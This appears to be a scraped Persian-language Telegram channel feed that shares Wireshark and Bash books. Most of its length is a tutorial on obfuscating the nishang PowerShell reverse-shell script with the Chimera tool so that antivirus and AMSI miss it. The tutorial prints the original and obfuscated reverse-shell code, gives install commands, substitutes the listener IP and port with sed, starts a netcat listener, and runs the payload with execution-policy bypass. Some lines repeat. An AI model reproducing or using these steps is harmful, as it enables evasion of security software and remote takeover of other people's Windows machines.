Kernel Kudos
9781803231679-LEARN_WIRESHARK.pdf
#Wireshark 🦈
وایرشارک،
ابزاری برای ترک کردن نتوورک هایی که مشکل performance دارن.
متخصص های امنیت اکثرا ازش برای شنود روی شبکه های مشکوک و خوندن پکت ها استفاده میکنن.
این کتاب صفر تا صدش رو گفته.
وایرشارک،
ابزاری برای ترک کردن نتوورک هایی که مشکل performance دارن.
متخصص های امنیت اکثرا ازش برای شنود روی شبکه های مشکوک و خوندن پکت ها استفاده میکنن.
این کتاب صفر تا صدش رو گفته.
❤1
❤1
داخل کانال قبل فیلم هم رکورد میشد ، ( خودم فیلم رکورد میکردم ، لینوکس تدریس میشد ، کوئیز میگرفتیم و غیره )
داخل این کانال هم همین روند رو پیاده میکنیم یک مقدار که ممبرها افزایش پیدا بکنه .
گزینه های روی میز رو بهتون میگم، طبق انتخاب خودتون و شرایط پیش رو ، یکی از مباحث رو استارت میزنیم و فیلم رکورد میکنیم 🕷️🕸️
#LInux #Cprogramming #POSIX
داخل این کانال هم همین روند رو پیاده میکنیم یک مقدار که ممبرها افزایش پیدا بکنه .
گزینه های روی میز رو بهتون میگم، طبق انتخاب خودتون و شرایط پیش رو ، یکی از مباحث رو استارت میزنیم و فیلم رکورد میکنیم 🕷️🕸️
#LInux #Cprogramming #POSIX
❤2👍1
Kernel Kudos
introduction-to-bash-noscripting-dark.pdf
#Bash Scripting Introduction
🔸 For those who have familiarity with Linux and it's bash and want to improve their knowledge in noscripting and automating Linux tasks .
این کتاب بهتون ایده میده . ولی خب اول باید لینوکس بلد باشید بعد برید سراغش
🔸 For those who have familiarity with Linux and it's bash and want to improve their knowledge in noscripting and automating Linux tasks .
این کتاب بهتون ایده میده . ولی خب اول باید لینوکس بلد باشید بعد برید سراغش
❤3
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
1. نصب پیش نیاز ها :
1. ساخت Payload :
1.2 تغییر ایپی :
پورت دیفالت اسکریپت 444 هستش :
1. ایجاد Listener در لینوکس با NetCat :
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
➖➖➖➖➖➖➖➖
✅ نحوه ی نصب در Linux :1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
2. کلون کردن ریپو :sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) : sudo chown root:root -R /opt/chimera/
4. تغییر مسیر به opt/chimera/ :cd /opt/chimera/
5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :sudo chmod +x chimera.sh
6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :./chimera.sh —help
➖➖➖➖➖➖➖➖
✅ نحوه ی استفاده از اسکریپت :1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1
2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1
➖➖➖➖➖➖➖➖
✅ گرفتن دسترسی :1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :powershell.exe -ep bypass C:\<PATH>\Payload.ps1
و تمام.امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
GitHub
nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - samratashok/nishang
🔥2